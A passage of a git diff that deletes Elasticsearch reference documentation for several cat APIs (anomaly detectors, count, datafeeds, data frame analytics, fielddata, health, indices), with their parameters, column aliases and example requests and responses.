-include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-count] - -`data.earliest_record`, `der`, `dataEarliestRecord`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=earliest-record-timestamp] - -`data.empty_buckets`, `deb`, `dataEmptyBuckets`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=empty-bucket-count] - -`data.input_bytes`, `dib`, `dataInputBytes`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=input-bytes] - -`data.input_fields`, `dif`, `dataInputFields`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=input-field-count] - -`data.input_records`, `dir`, `dataInputRecords`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=input-record-count] - -`data.invalid_dates`, `did`, `dataInvalidDates`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=invalid-date-count] - -`data.last`, `dl`, `dataLast`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=last-data-time] - -`data.last_empty_bucket`, `dleb`, `dataLastEmptyBucket`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=latest-empty-bucket-timestamp] - -`data.last_sparse_bucket`, `dlsb`, `dataLastSparseBucket`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=latest-sparse-record-timestamp] - -`data.latest_record`, `dlr`, `dataLatestRecord`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=latest-record-timestamp] - -`data.missing_fields`, `dmf`, `dataMissingFields`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=missing-field-count] - -`data.out_of_order_timestamps`, `doot`, `dataOutOfOrderTimestamps`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=out-of-order-timestamp-count] - -`data.processed_fields`, `dpf`, `dataProcessedFields`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=processed-field-count] - -`data.processed_records`, `dpr`, `dataProcessedRecords`::: -(Default) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=processed-record-count] - -`data.sparse_buckets`, `dsb`, `dataSparseBuckets`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=sparse-bucket-count] - -`forecasts.memory.avg`, `fmavg`, `forecastsMemoryAvg`::: -The average memory usage in bytes for forecasts related to the {anomaly-job}. - -`forecasts.memory.max`, `fmmax`, `forecastsMemoryMax`::: -The maximum memory usage in bytes for forecasts related to the {anomaly-job}. - -`forecasts.memory.min`, `fmmin`, `forecastsMemoryMin`::: -The minimum memory usage in bytes for forecasts related to the {anomaly-job}. - -`forecasts.memory.total`, `fmt`, `forecastsMemoryTotal`::: -The total memory usage in bytes for forecasts related to the {anomaly-job}. - -`forecasts.records.avg`, `fravg`, `forecastsRecordsAvg`::: -The average number of `model_forecast` documents written for forecasts related -to the {anomaly-job}. - -`forecasts.records.max`, `frmax`, `forecastsRecordsMax`::: -The maximum number of `model_forecast` documents written for forecasts related -to the {anomaly-job}. - -`forecasts.records.min`, `frmin`, `forecastsRecordsMin`::: -The minimum number of `model_forecast` documents written for forecasts related -to the {anomaly-job}. - -`forecasts.records.total`, `frt`, `forecastsRecordsTotal`::: -The total number of `model_forecast` documents written for forecasts related to -the {anomaly-job}. - -`forecasts.time.avg`, `ftavg`, `forecastsTimeAvg`::: -The average runtime in milliseconds for forecasts related to the {anomaly-job}. - -`forecasts.time.max`, `ftmax`, `forecastsTimeMax`::: -The maximum runtime in milliseconds for forecasts related to the {anomaly-job}. - -`forecasts.time.min`, `ftmin`, `forecastsTimeMin`::: -The minimum runtime in milliseconds for forecasts related to the {anomaly-job}. - -`forecasts.time.total`, `ftt`, `forecastsTimeTotal`::: -The total runtime in milliseconds for forecasts related to the {anomaly-job}. - -`forecasts.total`, `ft`, `forecastsTotal`::: -(Default) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=forecast-total] - -`id`::: -(Default) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -`model.bucket_allocation_failures`, `mbaf`, `modelBucketAllocationFailures`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-allocation-failures-count] - -`model.by_fields`, `mbf`, `modelByFields`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=total-by-field-count] - -`model.bytes`, `mb`, `modelBytes`::: -(Default) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-bytes] - -`model.bytes_exceeded`, `mbe`, `modelBytesExceeded`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-bytes-exceeded] - -`model.categorization_status`, `mcs`, `modelCategorizationStatus`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=categorization-status] - -`model.categorized_doc_count`, `mcdc`, `modelCategorizedDocCount`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=categorized-doc-count] - -`model.dead_category_count`, `mdcc`, `modelDeadCategoryCount`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dead-category-count] - -`model.failed_category_count`, `mdcc`, `modelFailedCategoryCount`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=failed-category-count] - -`model.frequent_category_count`, `mfcc`, `modelFrequentCategoryCount`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=frequent-category-count] - -`model.log_time`, `mlt`, `modelLogTime`::: -The timestamp when the model stats were gathered, according to server time. - -`model.memory_limit`, `mml`, `modelMemoryLimit`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-memory-limit-anomaly-jobs] - -`model.memory_status`, `mms`, `modelMemoryStatus`::: -(Default) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-memory-status] - -`model.over_fields`, `mof`, `modelOverFields`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=total-over-field-count] - -`model.partition_fields`, `mpf`, `modelPartitionFields`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=total-partition-field-count] - -`model.rare_category_count`, `mrcc`, `modelRareCategoryCount`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=rare-category-count] - -`model.timestamp`, `mt`, `modelTimestamp`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-timestamp] - -`model.total_category_count`, `mtcc`, `modelTotalCategoryCount`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=total-category-count] - -`node.address`, `na`, `nodeAddress`::: -The network address of the node. -+ -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=node-jobs] - -`node.ephemeral_id`, `ne`, `nodeEphemeralId`::: -The ephemeral ID of the node. -+ -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=node-jobs] - -`node.id`, `ni`, `nodeId`::: -The unique identifier of the node. -+ -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=node-jobs] - -`node.name`, `nn`, `nodeName`::: -The node name. -+ -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=node-jobs] - -`opened_time`, `ot`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=open-time] - -`state`, `s`::: -(Default) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=state-anomaly-job] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=time] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - -[[cat-anomaly-detectors-example]] -==== {api-examples-title} - -[source,console] --------------------------------------------------- -GET _cat/ml/anomaly_detectors?h=id,s,dpr,mb&v=true --------------------------------------------------- -// TEST[skip:kibana sample data] - -[source,console-result] ----- -id s dpr mb -high_sum_total_sales closed 14022 1.5mb -low_request_rate closed 1216 40.5kb -response_code_rates closed 28146 132.7kb -url_scanning closed 28146 501.6kb ----- -// TESTRESPONSE[skip:kibana sample data] diff --git a/docs/reference/cat/count.asciidoc b/docs/reference/cat/count.asciidoc deleted file mode 100644 index 39f3ab1bdaf..00000000000 --- a/docs/reference/cat/count.asciidoc +++ /dev/null @@ -1,98 +0,0 @@ -[[cat-count]] -=== cat count API -++++ -cat count -++++ - -Provides quick access to a document count for a data stream, an index, or an -entire cluster. - -NOTE: The document count only includes live documents, not deleted documents -which have not yet been removed by the merge process. - - -[[cat-count-api-request]] -==== {api-request-title} - -`GET /_cat/count/` - -`GET /_cat/count` - -[[cat-count-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `read` -<> for any data stream, index, or index -alias you retrieve. - -[[cat-count-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases used to limit -the request. Wildcard expressions (`*`) are supported. -+ -To target all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. - -[[cat-count-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - - -[[cat-count-api-example]] -==== {api-examples-title} - -[[cat-count-api-example-ind]] -===== Example with an individual data stream or index - -The following `count` API request retrieves the document count for the -`my-index-000001` data stream or index. - -[source,console] --------------------------------------------------- -GET /_cat/count/my-index-000001?v=true --------------------------------------------------- -// TEST[setup:my_index_big] - - -The API returns the following response: - -[source,txt] --------------------------------------------------- -epoch timestamp count -1475868259 15:24:20 120 --------------------------------------------------- -// TESTRESPONSE[s/1475868259 15:24:20/\\d+ \\d+:\\d+:\\d+/ non_json] - -[[cat-count-api-example-all]] -===== Example with all data streams and indices in a cluster - -The following `count` API request retrieves the document count for all data -streams and indices in the cluster. - -[source,console] --------------------------------------------------- -GET /_cat/count?v=true --------------------------------------------------- -// TEST[setup:my_index_big] -// TEST[s/^/POST test\/_doc\?refresh\n{"test": "test"}\n/] - -The API returns the following response: - -[source,txt] --------------------------------------------------- -epoch timestamp count -1475868259 15:24:20 121 --------------------------------------------------- -// TESTRESPONSE[s/1475868259 15:24:20/\\d+ \\d+:\\d+:\\d+/ non_json] diff --git a/docs/reference/cat/datafeeds.asciidoc b/docs/reference/cat/datafeeds.asciidoc deleted file mode 100644 index 9c8f9de6c8d..00000000000 --- a/docs/reference/cat/datafeeds.asciidoc +++ /dev/null @@ -1,131 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[cat-datafeeds]] -=== cat {dfeeds} API -++++ -cat {dfeeds} -++++ - -Returns configuration and usage information about {dfeeds}. - -[[cat-datafeeds-request]] -==== {api-request-title} - -`GET /_cat/ml/datafeeds/` + - -`GET /_cat/ml/datafeeds` - -[[cat-datafeeds-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor_ml`, -`monitor`, `manage_ml`, or `manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - - -[[cat-datafeeds-desc]] -==== {api-description-title} - -{dfeeds-cap} retrieve data from {es} for analysis by {anomaly-jobs}. For more -information, see {ml-docs}/ml-dfeeds.html[{dfeeds-cap}]. - -NOTE: This API returns a maximum of 10,000 jobs. - -[[cat-datafeeds-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=datafeed-id] - -[[cat-datafeeds-query-params]] -==== {api-query-parms-title} - -`allow_no_match`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=allow-no-datafeeds] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] -+ -If you do not specify which columns to include, the API returns the default -columns. If you explicitly specify one or more columns, it returns only the -specified columns. -+ -Valid columns are: - -`assignment_explanation`, `ae`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=assignment-explanation-datafeeds] - -`buckets.count`, `bc`, `bucketsCount`::: -(Default) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-count] - -`id`::: -(Default) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=datafeed-id] - -`node.address`, `na`, `nodeAddress`::: -The network address of the node. -+ -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=node-datafeeds] - -`node.ephemeral_id`, `ne`, `nodeEphemeralId`::: -The ephemeral ID of the node. -+ -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=node-datafeeds] - -`node.id`, `ni`, `nodeId`::: -The unique identifier of the node. -+ -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=node-datafeeds] - -`node.name`, `nn`, `nodeName`::: -The node name. -+ -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=node-datafeeds] - -`search.bucket_avg`, `sba`, `searchBucketAvg`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=search-bucket-avg] - -`search.count`, `sc`, `searchCount`::: -(Default) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=search-count] - -`search.exp_avg_hour`, `seah`, `searchExpAvgHour`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=search-exp-avg-hour] - -`search.time`, `st`, `searchTime`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=search-time] - -`state`, `s`::: -(Default) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=state-datafeed] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=time] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - -[[cat-datafeeds-example]] -==== {api-examples-title} - -[source,console] --------------------------------------------------- -GET _cat/ml/datafeeds?v=true --------------------------------------------------- -// TEST[skip:kibana sample data] - -[source,console-result] ----- -id state buckets.count search.count -datafeed-high_sum_total_sales stopped 743 7 -datafeed-low_request_rate stopped 1457 3 -datafeed-response_code_rates stopped 1460 18 -datafeed-url_scanning stopped 1460 18 ----- -// TESTRESPONSE[skip:kibana sample data] diff --git a/docs/reference/cat/dataframeanalytics.asciidoc b/docs/reference/cat/dataframeanalytics.asciidoc deleted file mode 100644 index 4fea7f5c87e..00000000000 --- a/docs/reference/cat/dataframeanalytics.asciidoc +++ /dev/null @@ -1,138 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[cat-dfanalytics]] -=== cat {dfanalytics} API -++++ -cat {dfanalytics} -++++ - -Returns configuration and usage information about {dfanalytics-jobs}. - - -[[cat-dfanalytics-request]] -==== {api-request-title} - -`GET /_cat/ml/data_frame/analytics/` + - -`GET /_cat/ml/data_frame/analytics` - - -[[cat-dfanalytics-prereqs]] -==== {api-prereq-title} - -If the {es} {security-features} are enabled, you must have the following -privileges: - -* cluster: `monitor_ml` - -For more information, see <> and {ml-docs-setup-privileges}. - - -//// -[[cat-dfanalytics-desc]] -==== {api-description-title} -//// - - -[[cat-dfanalytics-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-data-frame-analytics-default] - - -[[cat-dfanalytics-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] -+ -If you do not specify which columns to include, the API returns the default -columns. If you explicitly specify one or more columns, it returns only the -specified columns. -+ -Valid columns are: - -`assignment_explanation`, `ae`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=assignment-explanation-dfanalytics] - -`create_time`, `ct`, `createTime`::: -(Default) -The time when the {dfanalytics-job} was created. - -`description`, `d`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=description-dfa] - -`dest_index`, `di`, `destIndex`::: -Name of the destination index. - -`failure_reason`, `fr`, `failureReason`::: -Contains messages about the reason why a {dfanalytics-job} failed. - -`id`::: -(Default) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-data-frame-analytics] - -`model_memory_limit`, `mml`, `modelMemoryLimit`::: -The approximate maximum amount of memory resources that are permitted for the -{dfanalytics-job}. - -`node.address`, `na`, `nodeAddress`::: -The network address of the node that the {dfanalytics-job} is assigned to. - -`node.ephemeral_id`, `ne`, `nodeEphemeralId`::: -The ephemeral ID of the node that the {dfanalytics-job} is assigned to. - -`node.id`, `ni`, `nodeId`::: -The unique identifier of the node that the {dfanalytics-job} is assigned to. - -`node.name`, `nn`, `nodeName`::: -The name of the node that the {dfanalytics-job} is assigned to. - -`progress`, `p`::: -The progress report of the {dfanalytics-job} by phase. - -`source_index`, `si`, `sourceIndex`::: -Name of the source index. - -`state`, `s`::: -(Default) -Current state of the {dfanalytics-job}. - -`type`, `t`::: -(Default) -The type of analysis that the {dfanalytics-job} performs. - -`version`, `v`::: -The {es} version number in which the {dfanalytics-job} was created. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=time] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - - -[[cat-dfanalytics-example]] -==== {api-examples-title} - -[source,console] --------------------------------------------------- -GET _cat/ml/data_frame/analytics?v=true --------------------------------------------------- -// TEST[skip:kibana sample data] - -[source,console-result] ----- -id create_time type state -classifier_job_1 2020-02-12T11:49:09.594Z classification stopped -classifier_job_2 2020-02-12T11:49:14.479Z classification stopped -classifier_job_3 2020-02-12T11:49:16.928Z classification stopped -classifier_job_4 2020-02-12T11:49:19.127Z classification stopped -classifier_job_5 2020-02-12T11:49:21.349Z classification stopped ----- -// TESTRESPONSE[skip:kibana sample data] diff --git a/docs/reference/cat/fielddata.asciidoc b/docs/reference/cat/fielddata.asciidoc deleted file mode 100644 index 1979d8f8625..00000000000 --- a/docs/reference/cat/fielddata.asciidoc +++ /dev/null @@ -1,160 +0,0 @@ -[[cat-fielddata]] -=== cat fielddata API -++++ -cat fielddata -++++ - -Returns the amount of heap memory currently used by the -<> on every data node in the cluster. - - -[[cat-fielddata-api-request]] -==== {api-request-title} - -`GET /_cat/fielddata/` - -`GET /_cat/fielddata` - -[[cat-fielddata-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[cat-fielddata-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) Comma-separated list of fields used to limit returned -information. - - -[[cat-fielddata-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=bytes] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - - -[[cat-fielddata-api-example]] -==== {api-examples-title} - -//// -Hidden setup snippet to build an index with fielddata so our results are real: - -[source,console] --------------------------------------------------- -PUT test -{ - "mappings": { - "properties": { - "body": { - "type": "text", - "fielddata":true - }, - "soul": { - "type": "text", - "fielddata":true - }, - "mind": { - "type": "text", - "fielddata":true - } - } - } -} -POST test/_doc?refresh -{ - "body": "some words so there is a little field data", - "soul": "some more words", - "mind": "even more words" -} - -# Perform a search to load the field data -POST test/_search?sort=body,soul,mind --------------------------------------------------- -//// - -[[cat-fielddata-api-example-ind]] -===== Example with an individual field - -You can specify an individual field in the request body or URL path. The -following `fieldata` API request retrieves heap memory size information for the -`body` field. - -[source,console] --------------------------------------------------- -GET /_cat/fielddata?v=true&fields=body --------------------------------------------------- -// TEST[continued] - -The API returns the following response: - -[source,txt] --------------------------------------------------- -id host ip node field size -Nqk-6inXQq-OxUfOUI8jNQ 127.0.0.1 127.0.0.1 Nqk-6in body 544b --------------------------------------------------- -// TESTRESPONSE[s/544b|480b/\\d+(\\.\\d+)?[tgmk]?b/] -// TESTRESPONSE[s/Nqk-6in[^ ]*/.+/ non_json] - -[[cat-fielddata-api-example-list]] -===== Example with a list of fields - -You can specify a comma-separated list of fields in the request body or URL -path. The following `fieldata` API request retrieves heap memory size -information for the `body` and `soul` fields. - - -[source,console] --------------------------------------------------- -GET /_cat/fielddata/body,soul?v=true --------------------------------------------------- -// TEST[continued] - -The API returns the following response: - -[source,txt] --------------------------------------------------- -id host ip node field size -Nqk-6inXQq-OxUfOUI8jNQ 127.0.0.1 127.0.0.1 Nqk-6in body 544b -Nqk-6inXQq-OxUfOUI8jNQ 127.0.0.1 127.0.0.1 Nqk-6in soul 480b --------------------------------------------------- -// TESTRESPONSE[s/544b|480b/\\d+(\\.\\d+)?[tgmk]?b/] -// TESTRESPONSE[s/Nqk-6in[^ ]*/.+/ s/soul|body/\\w+/ non_json] - -The response shows the individual fielddata for the `body` and `soul` fields, -one row per field per node. - -[[cat-fielddata-api-example-all]] -===== Example with all fields in a cluster - -The following `fieldata` API request retrieves heap memory size -information all fields. - -[source,console] --------------------------------------------------- -GET /_cat/fielddata?v=true --------------------------------------------------- -// TEST[continued] - -The API returns the following response: - -[source,txt] --------------------------------------------------- -id host ip node field size -Nqk-6inXQq-OxUfOUI8jNQ 127.0.0.1 127.0.0.1 Nqk-6in body 544b -Nqk-6inXQq-OxUfOUI8jNQ 127.0.0.1 127.0.0.1 Nqk-6in mind 360b -Nqk-6inXQq-OxUfOUI8jNQ 127.0.0.1 127.0.0.1 Nqk-6in soul 480b --------------------------------------------------- -// TESTRESPONSE[s/544b|480b|360b/\\d+(\\.\\d+)?[tgmk]?b/] -// TESTRESPONSE[s/Nqk-6in[^ ]*/.+/ s/soul|body|mind/\\w+/ non_json] \ No newline at end of file diff --git a/docs/reference/cat/health.asciidoc b/docs/reference/cat/health.asciidoc deleted file mode 100644 index 53f9371a9b1..00000000000 --- a/docs/reference/cat/health.asciidoc +++ /dev/null @@ -1,145 +0,0 @@ -[[cat-health]] -=== cat health API -++++ -cat health -++++ - -Returns the health status of a cluster, similar to the <> API. - - -[[cat-health-api-request]] -==== {api-request-title} - -`GET /_cat/health` - -[[cat-health-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[cat-health-api-desc]] -==== {api-description-title} - -You can use the cat health API to get the health status of a cluster. - -[[timestamp]] -This API is often used to check malfunctioning clusters. To help you -track cluster health alongside log files and alerting systems, the API returns -timestamps in two formats: - -* `HH:MM:SS`, which is human-readable but includes no date information. -* {wikipedia}/Unix_time[Unix `epoch` time], which is -machine-sortable and includes date information. This is useful for cluster -recoveries that take multiple days. - -You can use the cat health API to verify cluster health across multiple nodes. -See <>. - -You also can use the API to track the recovery of a large cluster -over a longer period of time. See <>. - - -[[cat-health-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=time] - -`ts` (timestamps):: -(Optional, Boolean) If `true`, returns `HH:MM:SS` and -{wikipedia}/Unix_time[Unix `epoch`] timestamps. Defaults to -`true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - - -[[cat-health-api-example]] -==== {api-examples-title} - -[[cat-health-api-example-timestamp]] -===== Example with a timestamp -By default, the cat health API returns `HH:MM:SS` and -{wikipedia}/Unix_time[Unix `epoch`] timestamps. For example: - -[source,console] --------------------------------------------------- -GET /_cat/health?v=true --------------------------------------------------- -// TEST[s/^/PUT my-index-000001\n{"settings":{"number_of_replicas": 0}}\n/] - -The API returns the following response: - -[source,txt] --------------------------------------------------- -epoch timestamp cluster status node.total node.data shards pri relo init unassign pending_tasks max_task_wait_time active_shards_percent -1475871424 16:17:04 elasticsearch green 1 1 1 1 0 0 0 0 - 100.0% --------------------------------------------------- -// TESTRESPONSE[s/1475871424 16:17:04/\\d+ \\d+:\\d+:\\d+/] -// TESTRESPONSE[s/elasticsearch/[^ ]+/ s/0 -/\\d+ (-|\\d+(\\.\\d+)?[ms]+)/ non_json] - -[[cat-health-api-example-no-timestamp]] -===== Example without a timestamp -You can use the `ts` (timestamps) parameter to disable timestamps. For example: - -[source,console] --------------------------------------------------- -GET /_cat/health?v=true&ts=false --------------------------------------------------- -// TEST[s/^/PUT my-index-000001\n{"settings":{"number_of_replicas": 0}}\n/] - -The API returns the following response: - -[source,txt] --------------------------------------------------- -cluster status node.total node.data shards pri relo init unassign pending_tasks max_task_wait_time active_shards_percent -elasticsearch green 1 1 1 1 0 0 0 0 - 100.0% --------------------------------------------------- -// TESTRESPONSE[s/elasticsearch/[^ ]+/ s/0 -/\\d+ (-|\\d+(\\.\\d+)?[ms]+)/ non_json] - -[[cat-health-api-example-across-nodes]] -===== Example across nodes -You can use the cat health API to verify the health of a cluster across nodes. -For example: - -[source,sh] --------------------------------------------------- -% pssh -i -h list.of.cluster.hosts curl -s localhost:9200/_cat/health -[1] 20:20:52 [SUCCESS] es3.vm -1384309218 18:20:18 foo green 3 3 3 3 0 0 0 0 -[2] 20:20:52 [SUCCESS] es1.vm -1384309218 18:20:18 foo green 3 3 3 3 0 0 0 0 -[3] 20:20:52 [SUCCESS] es2.vm -1384309218 18:20:18 foo green 3 3 3 3 0 0 0 0 --------------------------------------------------- -// NOTCONSOLE - -[[cat-health-api-example-large-cluster]] -===== Example with a large cluster -You can use the cat health API to track the recovery of a large cluster over a -longer period of time. You can do this by including the cat health API request -in a delayed loop. For example: - -[source,sh] --------------------------------------------------- -% while true; do curl localhost:9200/_cat/health; sleep 120; done -1384309446 18:24:06 foo red 3 3 20 20 0 0 1812 0 -1384309566 18:26:06 foo yellow 3 3 950 916 0 12 870 0 -1384309686 18:28:06 foo yellow 3 3 1328 916 0 12 492 0 -1384309806 18:30:06 foo green 3 3 1832 916 4 0 0 -^C --------------------------------------------------- -// NOTCONSOLE - -In this example, the recovery took roughly six minutes, from `18:24:06` to -`18:30:06`. If this recovery took hours, you could continue to monitor the -number of `UNASSIGNED` shards, which should drop. If the number of `UNASSIGNED` -shards remains static, it would indicate an issue with the cluster recovery. \ No newline at end of file diff --git a/docs/reference/cat/indices.asciidoc b/docs/reference/cat/indices.asciidoc deleted file mode 100644 index fd76be527c7..00000000000 --- a/docs/reference/cat/indices.asciidoc +++ /dev/null @@ -1,122 +0,0 @@ -[[cat-indices]] -=== cat indices API -++++ -cat indices -++++ - -Returns high-level information about indices in a cluster, including backing -indices for data streams. - - -[[cat-indices-api-request]] -==== {api-request-title} - -`GET /_cat/indices/` - -`GET /_cat/indices` - -[[cat-indices-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. You must -also have the `monitor` or `manage` <> -for any data stream, index, or index alias you retrieve. - -[[cat-indices-api-desc]] -==== {api-description-title} - -Use the cat indices API to get the following information for each index in a -cluster: - -* Shard count -* Document count -* Deleted document count -* Primary store size -* Total store size of all shards, including shard replicas - -These metrics are retrieved directly from -https://lucene.apache.org/core/[Lucene], which {es} uses internally to power -indexing and search. As a result, all document counts include hidden -<> documents. - -To get an accurate count of {es} documents, use the <> or -<> APIs. - - -[[cat-indices-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases used to limit -the request. Wildcard expressions (`*`) are supported. -+ -To target all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. - -[[cat-indices-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=bytes] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=http-format] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-h] - -`health`:: -+ --- -(Optional, string) Health status used to limit returned indices. Valid values -are: - -* `green` -* `yellow` -* `red` - -By default, the response includes indices of any health status. --- - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=help] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=include-unloaded-segments] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - -[[pri-flag]] -`pri` (primary shards):: -(Optional, Boolean) If `true`, the response only includes information from -primary shards. Defaults to `false`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-s] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=time] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cat-v] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] - - -[[cat-indices-api-example]] -==== {api-examples-title} - -[[examples]] -[source,console] --------------------------------------------------- -GET /_cat/indices/my-index-*?v=true&s=index --------------------------------------------------- -// TEST[setup:my_index_huge] -// TEST[s/^/PUT my-index-000002\n{"settings": {"number_of_replicas": 0}}\n/] - -The API returns the following response: - -[source,txt] --------------------------------------------------- -health status index uuid pri rep docs.count docs.deleted store.size pri.store.size -yellow open my-index-000001 u8FNjxh8Rfy_awN11oDKYQ 1 1 1200 0 88.1kb 88.1kb -green open my-index-000002 nYFWZEO7TUiOjLQXBaYJpA 1 0 0 0 260b 260b --------------------------------------------------- -// 